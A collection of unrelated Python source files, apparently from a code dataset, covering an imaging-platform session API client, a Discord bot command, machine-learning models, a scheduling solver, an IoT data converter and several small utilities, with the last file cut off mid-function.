'url': '/session/permissions',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def logout(
self,
):
"""Logout.
"""
request_data = {
}
errors_mapping = {}
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
errors_mapping[('NOT_FOUND', None)] = NotFound('The sid was not found')
query_data = {
'api': self._api,
'url': '/session/logout',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def csrf_enable(
self,
redirect_uri,
):
"""Csrf enable.
:param redirect_uri: The URL to redirect to
"""
request_data = {
'redirect_uri': redirect_uri,
}
errors_mapping = {}
errors_mapping[('INVALID_URL', None)] = InvalidUrl('The URL must be a relative URL')
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/csrf/enable',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def uuid(
self,
):
"""Uuid.
"""
request_data = {
}
errors_mapping = {}
query_data = {
'api': self._api,
'url': '/session/uuid',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def oauth_start(
self,
):
"""Oauth start.
"""
request_data = {
}
errors_mapping = {}
errors_mapping[('NO_OAUTH', None)] = NoOauth('OAuth is not setup for the associated brand')
query_data = {
'api': self._api,
'url': '/session/oauth/start',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def oauth(
self,
code,
redirect_uri,
vendor,
):
"""Oauth.
:param code: The OAuth code
:param redirect_uri: The redirect_uri used to get the code parameter
:param vendor: The OAuth vendor (doximity|google|brand)
"""
request_data = {
'code': code,
'redirect_uri': redirect_uri,
'vendor': vendor,
}
errors_mapping = {}
errors_mapping[('AUTH_FAILED', None)] = AuthFailed('OAuth failed or a user id was not returned')
errors_mapping[('INVALID_CODE', None)] = InvalidCode('Invalid code')
errors_mapping[('INVALID_VENDOR', None)] = InvalidVendor('Invalid vendor')
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
errors_mapping[('MISSING_INFORMATION', None)] = MissingInformation('The response from the OAuth provider is missing either the email, first_name or last_name fields')
errors_mapping[('NO_OAUTH', None)] = NoOauth('OAuth is not setup for the associated brand')
errors_mapping[('OTHER_OAUTH', None)] = OtherOauth('The user is already setup to OAuth via another vendor')
query_data = {
'api': self._api,
'url': '/session/oauth',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def oauth_token(
self,
client_id,
client_secret,
grant_type,
duration=None,
):
"""Oauth token.
:param client_id: The users email address
:param client_secret: The users password
:param grant_type: The grant type, set to client_credentials
:param duration: The number of seconds the token is valid for (optional and defaults to 3600 with a maximum value of 86400)
"""
request_data = {
'client_id': client_id,
'client_secret': client_secret,
'duration': duration,
'grant_type': grant_type,
}
errors_mapping = {}
errors_mapping[('AUTH_FAILED', None)] = AuthFailed('Authentication failed')
errors_mapping[('LOCKOUT', None)] = Lockout('Too many failed attempts')
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/oauth/token',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': False,
}
return QueryO(**query_data)
def pin(
self,
pin,
remember_device=None,
):
"""Pin.
:param pin: The PIN
:param remember_device: Remember the device as trusted. (optional)
"""
request_data = {
'pin': pin,
'remember_device': remember_device,
}
errors_mapping = {}
errors_mapping[('INVALID_PIN', None)] = InvalidPin('Invalid PIN')
errors_mapping[('INVALID_SID', None)] = InvalidSid('Invalid sid')
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
errors_mapping[('PIN_EXPIRED', None)] = PinExpired('The PIN has expired')
query_data = {
'api': self._api,
'url': '/session/pin',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def sign(
self,
signature,
):
"""Sign.
:param signature: The Base64-encoded signature
"""
request_data = {
'signature': signature,
}
errors_mapping = {}
errors_mapping[('INVALID_SID', None)] = InvalidSid('Invalid sid')
errors_mapping[('INVALID_SIGNATURE', None)] = InvalidSignature('Invalid signature')
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/sign',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
def ttl(
self,
):
"""Ttl.
"""
request_data = {
}
errors_mapping = {}
errors_mapping[('EXPIRED', None)] = Expired('Expired')
        errors_mapping[('MISSING_FIELDS', None)] = MissingFields('A required field is missing or does not have data in it. The error_subtype holds an array of all the missing fields')
query_data = {
'api': self._api,
'url': '/session/ttl',
'request_data': request_data,
'errors_mapping': errors_mapping,
'required_sid': True,
}
return QueryO(**query_data)
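# Usage sketch (illustrative credentials; `api` is assumed to be an ambra_sdk Api
# instance, and executing the returned QueryO object is handled elsewhere in the SDK):
# session = Session(api)
# login_query = session.login(login='user@example.com', password='not-a-real-password')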
| StarcoderdataPython |
3259531 | import re
import subprocess
from ...exc import BleakError
def check_bluez_version(major: int, minor: int) -> bool:
"""
Checks the BlueZ version.
Returns:
``True`` if the BlueZ major version is equal to *major* and the minor
version is greater than or equal to *minor*, otherwise ``False``.
"""
# lazy-get the version and store it so we only have to run subprocess once
if not hasattr(check_bluez_version, "version"):
p = subprocess.Popen(["bluetoothctl", "--version"], stdout=subprocess.PIPE)
out, _ = p.communicate()
s = re.search(b"(\\d+).(\\d+)", out.strip(b"'"))
if not s:
raise BleakError(f"Could not determine BlueZ version: {out.decode()}")
setattr(check_bluez_version, "version", tuple(map(int, s.groups())))
bluez_major, bluez_minor = getattr(check_bluez_version, "version")
return bluez_major == major and bluez_minor >= minor
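# Usage sketch (illustrative threshold, not from this module): gate a feature on
# the installed BlueZ version. check_bluez_version(5, 46) is True only when the
# detected major version is exactly 5 and the minor version is at least 46.
# if not check_bluez_version(5, 46):
#     raise BleakError("this feature requires BlueZ >= 5.46")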
| StarcoderdataPython |
173031 | import datetime
from mantabot import command
class Clear(command.Command):
""" Bot command that deletes messages """
name = 'clear'
errors = {
'usage': '{name} <number>|<text>|me\n'
'→ *<number>*: clear that many messages.\n'
'→ *<text>*: clear all messages since that text last appeared.\n'
'→ me: clear all messages since last time you wrote.',
'permission_denied': 'I cannot manage messages in this channel.',
'not_found': 'I did not find that message in the last {limit} ones.',
'need_force': 'This is a lot of messages. Please confirm with `!{name} {number} force`.',
}
async def execute(self, message, args):
if len(args) == 0:
await self.error('usage', name=self.name)
elif len(args) == 1 or (len(args) == 2 and args[1].lower() == 'force'):
if args[0] == 'help':
await self.error('usage', name=self.name)
elif args[0] == 'me':
await self.self_clear(message)
else:
try:
number = int(args[0])
except ValueError:
await self.search_clear(message, args[0])
else:
if number < 100 or len(args) == 2:
await self.count_clear(message, number)
else:
await self.error('need_force', name=self.name, number=number)
else:
await self.search_clear(message, ' '.join(args))
async def clear_while(self, message, check, inclusive=False):
""" clear all messages until the check is false """
now = datetime.datetime.now().timestamp()
async with message.channel.typing():
to_delete = []
async for msg in message.channel.history(limit=100, before=message):
if now - msg.created_at.timestamp() >= 1209600:
break # cannot clear messages older than 14 days
if not check(msg):
if inclusive:
to_delete.append(msg)
break
to_delete.append(msg)
else:
return False
for idx in range(0, len(to_delete), 100):
await message.channel.delete_messages(to_delete[idx:idx+100])
return True
async def self_clear(self, message):
found = await self.clear_while(message, lambda msg: msg.author.id != message.author.id)
if not found:
await self.error('not_found', limit=100)
async def count_clear(self, message, number):
async with message.channel.typing():
await message.channel.purge(before=message, limit=number)
async def search_clear(self, message, text):
text = text.lower()
found = await self.clear_while(message, lambda msg: text not in msg.content.lower(), inclusive=True)
if not found:
await self.error('not_found', text=text, limit=100)
| StarcoderdataPython |
3235285 | # _*_ coding:utf-8 _*_
import tensorflow as tf
class Network:
r"""网络结构,2个隐藏层,1个输出层,第一个隐藏层有500个神经元,第二层有100个,输出层10个,并附带检验方法
学习率0.01
激活函数:Relu
损失函数:交叉熵
优化器:AdagradOptimizer(改良型梯度下降)
"""
def __init__(self,datasize:int,labelsize:int)->None:
r"""构造网络计算图,输入参数为训练集数据大小和对应标签(独热码)大小
"""
self.data_size = datasize
self.label_size = labelsize
        # Define the global training step counter
self.global_step = tf.Variable(0, trainable=False)
        # Define the learning rate
self.learning_rate = 0.01
        # Placeholders for the training data and the corresponding labels
self.x = tf.placeholder(tf.float32, [None,self.data_size])
self.y_ = tf.placeholder(tf.float32, [None, self.label_size])
        # Placeholder for the dropout keep probability (a fraction 1 - keep_prob of activations is dropped; typically used in fully connected layers to reduce overfitting)
self.keep_prob = tf.placeholder(tf.float32)
        # Weight tensors for each layer; hidden-layer weights start from small random values
w1 = tf.Variable(tf.truncated_normal([self.data_size,500],stddev = 0.1))
w2 = tf.Variable(tf.truncated_normal([500,100],stddev = 0.1))
w = tf.Variable(tf.zeros([100,self.label_size]))
        # Bias tensors for each layer, initialized to zero
b1 = tf.Variable(tf.zeros([500]))
b2 = tf.Variable(tf.zeros([100]))
b = tf.Variable(tf.zeros([self.label_size]))
        # Computation nodes: matrix multiplications with ReLU activations
a1 = tf.nn.relu(tf.matmul(self.x,w1)+b1)
a1_drop = tf.nn.dropout(a1,self.keep_prob)
a2 = tf.nn.relu(tf.matmul(a1_drop,w2)+b2)
a2_drop = tf.nn.dropout(a2,self.keep_prob)
        # Output layer: softmax maps the logits to probabilities in [0, 1]
self.y = tf.nn.softmax(tf.matmul(a2_drop, w) + b)
        # Loss: cross-entropy between the network output and the labels
self.loss = tf.reduce_mean(-tf.reduce_sum(self.y_*tf.log(self.y),reduction_indices = [1]))
        # Optimizer: Adagrad, an improved gradient descent that adapts the learning rate automatically
self.train = tf.train.AdagradOptimizer(self.learning_rate).minimize(self.loss,global_step=self.global_step)
        # Prediction and accuracy ops
self.predict = tf.equal(tf.argmax(self.y_, 1), tf.argmax(self.y, 1))
self.accuracy = tf.reduce_mean(tf.cast(self.predict, "float"))
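# Minimal usage sketch (illustrative; assumes TensorFlow 1.x and MNIST-sized data,
# so the 784/10 sizes and the batch_x/batch_y/test_x/test_y arrays are placeholders):
# net = Network(784, 10)
# with tf.Session() as sess:
#     sess.run(tf.global_variables_initializer())
#     _, loss = sess.run([net.train, net.loss],
#                        feed_dict={net.x: batch_x, net.y_: batch_y, net.keep_prob: 0.75})
#     acc = sess.run(net.accuracy,
#                    feed_dict={net.x: test_x, net.y_: test_y, net.keep_prob: 1.0})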
| StarcoderdataPython |
1697788 | from sympy import symbols, sin, pi, latex
from ga import Ga
from printer import Format, xpdf
Format()
coords = (r, th, phi) = symbols('r,theta,phi', real=True)
sp3d = Ga('e_r e_th e_ph', g=[1, r**2, r**2*sin(th)**2], coords=coords, norm=True)
sph_uv = (u, v) = symbols('u,v', real=True)
sph_map = [1, u, v] # Coordinate map for sphere of r = 1
sph2d = sp3d.sm(sph_map,sph_uv)
print r'(u,v)\rightarrow (r,\theta,\phi) = ',latex(sph_map)
print 'g =',latex(sph2d.g)
F = sph2d.mv('F','vector',f=True) #scalar function
f = sph2d.mv('f','scalar',f=True) #vector function
print r'\nabla f =',sph2d.grad * f
print 'F =',F
print r'\nabla F = ',sph2d.grad * F
cir_s = s = symbols('s',real=True)
cir_map = [pi/8,s]
cir1d = sph2d.sm(cir_map,(cir_s,))
print 'g =',latex(cir1d.g)
h = cir1d.mv('h','scalar',f=True)
H = cir1d.mv('H','vector',f=True)
print r'(s)\rightarrow (u,v) = ',latex(cir_map)
print 'H =', H
print latex(H)
print r'\nabla h =', cir1d.grad * h
print r'\nabla H =', cir1d.grad * H
xpdf(filename='submanifold.tex',paper=(6,5),crop=True)
| StarcoderdataPython |
1764441 | from jssp_ga import jssp_instance
class Schedule:
def __init__(self, schedule, jssp_instance):
self.schedule = schedule
self.decomposed_tasks = self.decompose_tasks(jssp_instance)
self.task_durations = {}
self.get_task_times()
def __getitem__(self, index):
return self.decomposed_tasks[self.schedule[index]]
def decompose_tasks(self, jssp_instance):
decomposed_tasks = {}
for job in range(len(jssp_instance)):
for task in range(jssp_instance.number_of_machines):
current_task = jssp_instance[job][task]
preceeding_task = jssp_instance[job][task - 1]
job_machine_id = (job, current_task["machine_id"])
task_duration = current_task["duration"]
precedence = (job, preceeding_task["machine_id"])
if task == 0:
precedence = None
decomposed_task = {
"duration": task_duration,
"precedence": precedence,
}
decomposed_tasks[job_machine_id] = decomposed_task
return decomposed_tasks
def get_preceeding_task(self, task):
if self.decomposed_tasks[task]["precedence"] is None:
return (-1, -1)
else:
return self.decomposed_tasks[task]["precedence"]
def check_task_in_progress(self, task):
if task not in self.task_durations:
return {
"start_time": 0,
"duration": 0,
"end_time": 0,
}
else:
return self.task_durations[task]
def check_busy_machine(self, machine_id):
keys = [key for key in self.task_durations if key[1] == machine_id]
if not keys:
return [
{
"start_time": 0,
"duration": 0,
"end_time": 0,
}
]
else:
return [self.task_durations[key] for key in keys]
def get_last_machine_end_time(self, machine_tasks):
return max(task["end_time"] for task in machine_tasks)
def add_all_durations(self):
max_makespan = 0
for task in self.decomposed_tasks:
max_makespan += self.decomposed_tasks[task]["duration"]
return max_makespan
def get_task_times(self):
self.task_durations[self.schedule[0]] = {
"start_time": 0,
"duration": self[0]["duration"],
"end_time": 0 + self[0]["duration"],
}
for task in range(1, len(self.schedule)):
preceeding_task = self.get_preceeding_task(self.schedule[task])
preceeding_task_end_time = self.check_task_in_progress(preceeding_task)[
"end_time"
]
same_machine_jobs = self.check_busy_machine(self.schedule[task][1])
same_machine_last_end_time = self.get_last_machine_end_time(
same_machine_jobs
)
new_start_time = max(preceeding_task_end_time, same_machine_last_end_time)
task_duration = self[task]["duration"]
self.task_durations[self.schedule[task]] = {
"start_time": new_start_time,
"duration": task_duration,
"end_time": new_start_time + task_duration,
}
def calculate_makespan(self):
return max(
self.task_durations[key]["end_time"] for key in self.task_durations.keys()
)
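# Usage sketch (illustrative names): `instance` is assumed to be a jssp_instance
# object like the one imported above, and `order` a permutation of
# (job, machine_id) pairs covering every task exactly once.
# schedule = Schedule(order, instance)
# print(schedule.calculate_makespan())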
| StarcoderdataPython |
1764110 | # Copyright 2021. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import time
from simplejson import dumps
from thingsboard_gateway.connectors.rest.rest_converter import RESTConverter, log
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
class JsonRESTUplinkConverter(RESTConverter):
def __init__(self, config):
self.__config = config
def convert(self, config, data):
datatypes = {"attributes": "attributes",
"timeseries": "telemetry"}
dict_result = {"deviceName": None, "deviceType": None, "attributes": [], "telemetry": []}
try:
if self.__config.get("deviceNameExpression") is not None:
dict_result["deviceName"] = TBUtility.get_value(self.__config.get("deviceNameExpression"), data, expression_instead_none=True)
else:
log.error("The expression for looking \"deviceName\" not found in config %s", dumps(self.__config))
if self.__config.get("deviceTypeExpression") is not None:
dict_result["deviceType"] = TBUtility.get_value(self.__config.get("deviceTypeExpression"), data, expression_instead_none=True)
else:
log.error("The expression for looking \"deviceType\" not found in config %s", dumps(self.__config))
except Exception as e:
log.error('Error in converter, for config: \n%s\n and message: \n%s\n', dumps(self.__config), data)
log.exception(e)
try:
for datatype in datatypes:
dict_result[datatypes[datatype]] = []
for datatype_config in self.__config.get(datatype, []):
value = TBUtility.get_value(datatype_config["value"], data, datatype_config["type"], expression_instead_none=True)
value_tag = TBUtility.get_value(datatype_config["value"], data, datatype_config["type"], get_tag=True)
key = TBUtility.get_value(datatype_config["key"], data, datatype_config["type"], expression_instead_none=True)
key_tag = TBUtility.get_value(datatype_config["key"], data, get_tag=True)
if ("${" not in str(value) and "}" not in str(value)) \
and ("${" not in str(key) and "}" not in str(key)):
is_valid_key = isinstance(key, str) and "${" in datatype_config["key"] and "}" in datatype_config["key"]
is_valid_value = isinstance(value, str) and "${" in datatype_config["value"] and "}" in datatype_config["value"]
full_key = datatype_config["key"].replace('${' + str(key_tag) + '}', str(key)) if is_valid_key else key
full_value = datatype_config["value"].replace('${' + value_tag + '}', value) if is_valid_value else value
if datatype == 'timeseries' and (data.get("ts") is not None or data.get("timestamp") is not None):
dict_result[datatypes[datatype]].append(
{"ts": data.get('ts', data.get('timestamp', int(time()))), 'values': {full_key: full_value}})
else:
dict_result[datatypes[datatype]].append({full_key: full_value})
except Exception as e:
log.error('Error in converter, for config: \n%s\n and message: \n%s\n', dumps(self.__config), str(data))
log.exception(e)
return dict_result
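# Illustrative converter config / payload pair (example values only; shown to
# clarify the ${...} expression substitution performed above):
# config = {"deviceNameExpression": "${serialNumber}",
#           "deviceTypeExpression": "default",
#           "timeseries": [{"type": "double", "key": "temperature", "value": "${temp}"}]}
# converter = JsonRESTUplinkConverter(config)
# converted = converter.convert(config, {"serialNumber": "SN-001", "temp": 23.5})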
| StarcoderdataPython |
3276737 | from dataclasses import asdict, dataclass
from logging import Logger
from torch.optim.adam import Adam # pylint: disable=no-name-in-module
from src.core.common.checkpoint import Checkpoint
from src.core.waveglow.hparams import HParams
from src.core.waveglow.model import WaveGlow
@dataclass
class CheckpointWaveglow(Checkpoint):
# pylint: disable=arguments-differ
def get_hparams(self, logger: Logger) -> HParams:
return super().get_hparams(logger, HParams)
@classmethod
def from_instances(cls, model: WaveGlow, optimizer: Adam, hparams: HParams, iteration: int):
result = cls(
state_dict=model.state_dict(),
optimizer=optimizer.state_dict(),
learning_rate=hparams.learning_rate,
iteration=iteration,
hparams=asdict(hparams),
)
return result
| StarcoderdataPython |
3261706 | #!/usr/bin/env python
# -*- coding: utf-8 -*-#
#-------------------------------------------------------------------------------
# Name: main
# Description: the entry point of the program
# Author: <NAME>
# Date: 2021/08/06
#-------------------------------------------------------------------------------
import _init_paths
from config import cfg, update_config
import argparse
from dataset import *
import os
from torch.utils.data import DataLoader
import torch
from train import train
def parse_args():
parser = argparse.ArgumentParser(description="Fine-tune CLIP with a medical dataset.")
# cfg
parser.add_argument(
"--cfg",
help="decide which cfg to use",
required=False,
default="/home/test.yaml",
type=str,
)
# GPU config
    parser.add_argument('--seed', type=int, default=5,
                        help='random seed for gpu. default: 5')
parser.add_argument('--gpu', type=int, default=0,
help='use gpu device. default:0')
args = parser.parse_args()
return args
if __name__ == '__main__':
data = cfg.DATASET.DATA_DIR
args = parse_args()
args.data_dir = data
# set GPU device
device = torch.device("cuda:" + str(args.gpu) if args.gpu >= 0 else "cpu")
update_config(cfg, args)
# Fixed random seed
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.deterministic = True
# prepare the dataloader
train_dataset = ImageTextDataset("train", cfg)
train_loader = DataLoader(train_dataset, cfg.TRAIN.BATCH_SIZE, shuffle=True, num_workers=2, drop_last=True, pin_memory=True)
val_dataset = ImageTextDataset("val", cfg)
val_loader = DataLoader(val_dataset, cfg.TEST.BATCH_SIZE, shuffle=True, num_workers=2, drop_last=True, pin_memory=True)
# training phase
train(cfg, train_loader, val_loader, device)
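# Example invocation (illustrative script name and paths; the --cfg default
# above points at /home/test.yaml):
#   python main.py --cfg /home/test.yaml --gpu 0 --seed 5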
| StarcoderdataPython |
1775544 | '''
Created on 19 Feb. 2019
@author: <NAME>
'''
class Mention:
'''
classdocs
'''
def __init__(self, name, context, e_type, sentence_words):
'''
Constructor
'''
self.name= name
self.context= context
self.e_type= e_type
self.sentence_words= sentence_words
| StarcoderdataPython |
195599 | #!/usr/bin/env python
# coding: utf-8
"""
Generate random data for your application
"""
import argparse, logging, importlib
from echolalia.generator import Generator
def add_args():
parser = argparse.ArgumentParser(
description='Generate random data for your application')
parser.add_argument('-w', '--writer', type=str, default='stdout')
parser.add_argument('-f', '--format', type=str, default='json')
parser.add_argument('-c', '--count', type=int, default=1)
parser.add_argument('-v', '--verbose', action='store_true')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-t', '--template', type=str)
group.add_argument('-i', '--items', type=str, action='append', metavar='KEY=VALUE')
return parser
def init_logging(verbose=False):
if verbose:
level = logging.DEBUG
else:
level = logging.ERROR
logging.basicConfig(
format='%(levelname)-9s %(funcName)s:%(lineno)d - %(message)s',
datefmt='%H:%M:%S',
level=level)
return logging.getLogger()
def main():
parser = add_args()
(args, _) = parser.parse_known_args()
writer = args.writer
formatter = args.format
mod = importlib.import_module('echolalia.writer.{}'.format(writer))
writer = mod.Writer()
parser = writer.add_args(parser)
mod = importlib.import_module('echolalia.formatter.{}er'.format(formatter))
formatter = mod.Formatter()
parser = formatter.add_args(parser)
args = parser.parse_args()
log = init_logging(verbose=args.verbose)
log.debug('Start')
template = args.template
count = args.count
if template is None:
log.debug('Generating {} docs with {} item(s)'.format(count, len(args.items)))
items = {}
for item in args.items:
kv = item.split("=", 1)
if len(kv) == 2:
items[kv[0]] = kv[1]
else:
items[item] = item
generator = Generator(items=items)
else:
log.debug('Generating {} docs with template {}'.format(count, template))
generator = Generator(template=template)
data = generator.generate(count)
log.debug('Marshalling with formatter "{}"'.format(args.format))
docs = formatter.marshall(args, data)
log.debug('Writing with writer "{}"'.format(args.writer))
writer.write(args, docs)
log.debug('Done')
parser.exit(status=0)
if __name__ == '__main__':
main()
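# Example invocations (illustrative; the script/module name may differ):
#   python -m echolalia -c 3 -i name -i color=red
#   python -m echolalia -c 5 -t template.json -w stdout -f json -v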
| StarcoderdataPython |
3208192 | <reponame>Starrah/THU-SuperMoon
import os.path as osp
from itertools import product
from random import shuffle
import numpy as np
import openslide
from tqdm import tqdm
from scipy import ndimage
from skimage.filters import threshold_otsu
from skimage.morphology import dilation, star
BACKGROUND = 0
FOREGROUND = 1
def sample_patch_coors(slide_dir, num_sample=2000, patch_size=256):
slide = openslide.open_slide(slide_dir)
slide_name = osp.basename(slide_dir)
slide_name = slide_name[:slide_name.rfind('.')]
mini_frac = 32
mini_size = np.ceil(np.array(slide.level_dimensions[0]) / mini_frac).astype(np.int)
mini_level = get_just_gt_level(slide, mini_size)
mini_patch_size = patch_size // mini_frac
bg_mask = generate_background_mask(slide, mini_level, mini_size)
assert bg_mask.shape == (mini_size[1], mini_size[0])
# extract patches from available area
patch_coors = []
num_row, num_col = bg_mask.shape
num_row = num_row - mini_patch_size
num_col = num_col - mini_patch_size
row_col = list(product(range(num_row), range(num_col)))
shuffle(row_col)
cnt = 0
# attention center
H_min = int(np.ceil(mini_patch_size / 8))
H_max = int(np.ceil(mini_patch_size / 8 * 7))
W_min = int(np.ceil(mini_patch_size / 8))
W_max = int(np.ceil(mini_patch_size / 8 * 7))
# half of the center
th_num = int(np.ceil((mini_patch_size * 3 / 4 * mini_patch_size * 3 / 4)))
pbar = tqdm(total=num_sample)
for row, col in row_col:
if cnt >= num_sample:
break
mini_patch = bg_mask[row:row + mini_patch_size, col: col + mini_patch_size]
origin = (int(col * mini_frac), int(row * mini_frac), patch_size, patch_size)
if np.count_nonzero(mini_patch[H_min:H_max, W_min:W_max]) >= th_num:
# # filter those white background
# if is_bg(slide, origin, patch_size):
# continue
patch_coors.append(origin)
cnt += 1
pbar.update(1)
pbar.close()
return patch_coors
# get the just size that equal to mask_size
def get_just_gt_level(slide: openslide, size):
level = slide.level_count - 1
while level >= 0 and slide.level_dimensions[level][0] < size[0] and \
slide.level_dimensions[level][1] < size[1]:
level -= 1
return level
def generate_background_mask(slide: openslide, mini_level, mini_size):
img = slide.read_region((0, 0), mini_level, slide.level_dimensions[mini_level])
img = img.resize(mini_size)
bg_mask = threshold_segmentation(img)
img.close()
return bg_mask
# background segmentation algorithm
def threshold_segmentation(img):
# calculate the overview level size and retrieve the image
img_hsv = img.convert('HSV')
img_hsv_np = np.array(img_hsv)
# dilate image and then threshold the image
schannel = img_hsv_np[:, :, 1]
mask = np.zeros(schannel.shape)
schannel = dilation(schannel, star(3))
schannel = ndimage.gaussian_filter(schannel, sigma=(5, 5), order=0)
threshold_global = threshold_otsu(schannel)
mask[schannel > threshold_global] = FOREGROUND
mask[schannel <= threshold_global] = BACKGROUND
return mask
def is_bg(slide, origin, patch_size):
img = slide.read_region(origin, 0, (patch_size, patch_size))
# bad case is background
if np.array(img)[:, :, 1].mean() > 200: # is bg
img.close()
return True
else:
img.close()
return False
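# Usage sketch (illustrative path and sizes):
# slide_path = '/data/slides/slide_001.svs'
# coors = sample_patch_coors(slide_path, num_sample=500, patch_size=256)
# slide = openslide.open_slide(slide_path)
# patches = [slide.read_region(c[:2], 0, c[2:]) for c in coors]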
| StarcoderdataPython |
3233976 | <gh_stars>100-1000
# Copyright 2017, <NAME>, All rights reserved.
class AppError(Exception):
"""
Exception indicating an error
"""
pass
class ServiceExit(AppError):
"""
Custom exception which is used to trigger the clean exit
of all running threads and the main program.
"""
pass
class ServiceRestart(AppError):
"""
Exception indicating a restart is requested
"""
pass
| StarcoderdataPython |
1646535 | <reponame>SEQUOIIA/shipment-tracker
from sys import exit
class Provider:
def __init__(self):
self.name = ""
@staticmethod
def getProgress(shippingCode):
print("getProgress not implemented for provider yet.")
exit(1)
class ShipmentProgress:
def __init__(self):
self.status = []
self.packageID = ""
self.packageStatus = ""
def addStatus(self, status):
self.status.append(status)
def statusSize(self):
        return len(self.status)
 | StarcoderdataPython |
3270816 | <filename>Engine/ScanRing.py
def ScanRing(RingPositions, HOOK_OPTION):
NoHasRing = [0, 0]
if HOOK_OPTION == 0:
import pyautogui
NoHasRing = pyautogui.locateOnScreen('images/PlayerStats/NoRing.png', confidence=0.9, region=(
RingPositions[0], RingPositions[1], RingPositions[2], RingPositions[3]))
if NoHasRing:
return True
else:
return False
elif HOOK_OPTION == 1:
from Engine.HookWindow import LocateImage
NoHasRing[0], NoHasRing[1] = LocateImage('images/PlayerStats/NoRing.png', Precision=0.9, Region=(
RingPositions[0], RingPositions[1], RingPositions[2], RingPositions[3]))
if NoHasRing[0] != 0 and NoHasRing[1] != 0:
return True
else:
return False
def SearchForRing(Ring, HOOK_OPTION):
FoundRing = [0, 0]
if HOOK_OPTION == 0:
import pyautogui
FoundRing = pyautogui.locateCenterOnScreen('images/Rings/' + Ring + '.png', confidence=0.9)
if FoundRing:
return FoundRing[0], FoundRing[1]
else:
return 0, 0
elif HOOK_OPTION == 1:
from Engine.HookWindow import LocateCenterImage
FoundRing[0], FoundRing[1] = LocateCenterImage('images/Rings/' + Ring + '.png', Precision=0.9)
if FoundRing[0] != 0 and FoundRing[1] != 0:
return FoundRing[0], FoundRing[1]
else:
return 0, 0
| StarcoderdataPython |
4814635 | """Contains utilities for handling dimensions."""
import logging
import math
from copy import deepcopy
from typing import Any, List, Optional, Tuple, TypedDict, Union
import numpy as np # type: ignore[import]
import pandas as pd # type: ignore[import]
CatBin = Union[str, pd.Interval]
def analyze_data_type(data_list: List[Any]) -> Tuple[List[Any], bool]:
"""Look at the data, remove any null-like values, sort, and tell if it's numerical."""
def is_nullish(val: Any) -> bool:
if isinstance(val, str):
return not bool(val) or str.isspace(val)
if isinstance(val, float):
return math.isnan(val)
return False
uniques = sorted({e for e in data_list if not is_nullish(e)})
is_numerical = isinstance(uniques[0], (float, int)) # sorted, so only need first
return uniques, is_numerical
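# Illustrative behaviour of analyze_data_type (derived from the code above):
# analyze_data_type([3, 1, float('nan'), 2]) -> ([1, 2, 3], True)
# analyze_data_type(['b', ' ', 'a', ''])     -> (['a', 'b'], False)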
class Dim:
"""Wraps a single dimension's metadata."""
def __init__(
self,
name: str,
catbins: List[CatBin],
is_10pow: bool = False,
is_discrete: bool = True,
) -> None:
self.catbins = catbins
self.name = name
self.is_10pow = is_10pow
if all(isinstance(c, pd.Interval) for c in catbins):
self.is_numerical = True
self.is_discrete = is_discrete
elif all(isinstance(c, str) for c in catbins):
self.is_numerical = False
self.is_discrete = True
else:
raise ValueError(f"Dim has invalid catbin type(s): {name=}, {catbins=}")
def __eq__(self, other: object) -> bool:
return (
isinstance(other, Dim)
and self.name == other.name
and self.catbins == other.catbins
)
def __repr__(self) -> str:
return f'Dim("{self.name}", #catbins={len(self.catbins)})'
@staticmethod
def from_pandas_df(
name: str, df: pd.DataFrame, num_bins: Optional[int] = None
) -> "Dim":
"""Factory from a pandas dataframe.
All intervals are left-inclusive: [a,b)
"""
is_10pow = False
def sturges_rule() -> int:
"""Use Sturges’ Rule, calculated by cardinality of set."""
return int(np.ceil(np.log2(len(df[name])) + 1))
def get_cut(num: int) -> List[pd.Interval]:
# print(max(values))
# print(min(values))
return list(
pd.cut(
np.linspace(min(unique_values), max(unique_values), num=num),
num,
include_lowest=True,
right=False,
)
)
def dist(one: int, two: int) -> float:
"""Get the "distance" between the two, calculated by degree of similarity."""
return max(one, two) / min(one, two)
# return np.abs(one - two) # type: ignore[no-any-return]
class TenPowException(Exception):
"""Raise when 10-Pow algo fails."""
def get_10pow() -> List[pd.Interval]:
logging.info(f"10^N Binning ({name})...")
sturges = sturges_rule()
# get starting power by rounding up "largest" value to nearest power of 10
largest_value = max(np.abs(max(unique_values)), np.abs(min(unique_values)))
power = int(np.ceil(np.log10(largest_value)))
prev = None
for power_offset in range(7): # 7; think: low-range high-value; 2000, 2001
